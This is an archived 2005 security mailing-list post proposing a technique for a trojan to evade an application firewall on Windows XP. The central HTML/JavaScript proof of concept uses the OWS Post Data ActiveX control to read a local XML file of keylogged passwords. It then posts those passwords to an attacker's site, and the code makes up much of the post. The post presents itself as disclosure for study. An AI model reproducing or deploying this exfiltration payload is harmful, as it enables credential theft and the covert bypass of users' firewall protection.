lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Wed Dec 21 15:32:05 2005
From: gaurav at securebox.org (Gaurav Kumar)
Subject: new attack technique? using JavaScript+XML+OWS
	Post Data

While researching COM related security vulnerabilities I thought of
this possible attack technique, not sure if it has been discussed
before.


Problem/challenge statement:

A Trojan has been to be placed in a system running an application
firewall like Zone Alarm Pro etc. The Trojan is not allowed to make
any outbound connections. The challenge is to send data (key logged
passwords etc) back to the attacker.


Assumptions:

The target system must be having office XP and the user has to be
lured to view a webpage hosted by attacker.


Solution

The Trojan can be designed to generate an xml file which will contain
the data to be sent out. The attacker will lure the user to visit a
website hosted by him. The site can have following HTML code-

<html>
<body>
The author is not responsible for any misuse, this PoC is for
educational purpose only.
<object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
id="exp">
</object>
<script LANGUAGE=javascript>
var xmlDoc
xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async=false;
xmlDoc.load("c:\\note.xml");
xmlObj=xmlDoc.documentElement;
var a= xmlObj.firstChild.text;
exp.Post(0,"http://www.attackersite.com/input.asp",a);
</script>
</body>
</html>

Content of note.xml could be ?

<password>secret</password>


The above code (works well on windows XP SP2) essentials calls "OWS
Post Data" COM control to post the contents of note.xml (generated by
trojan) to attackersite.com

Essentially, the technique is breaking the basic functionality of
application firewalls by using OWS Post Data as bridge for sending out
the data using Javascript and XML.


Disclaimer-
I am not responsible for any misuse or damage arising out by above technique.

flames/spam/abuse etc can be sent to spam@...urebox.org
comments can be sent to gaurav@...urebox.org

Regards,
Gaurav Kumar.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ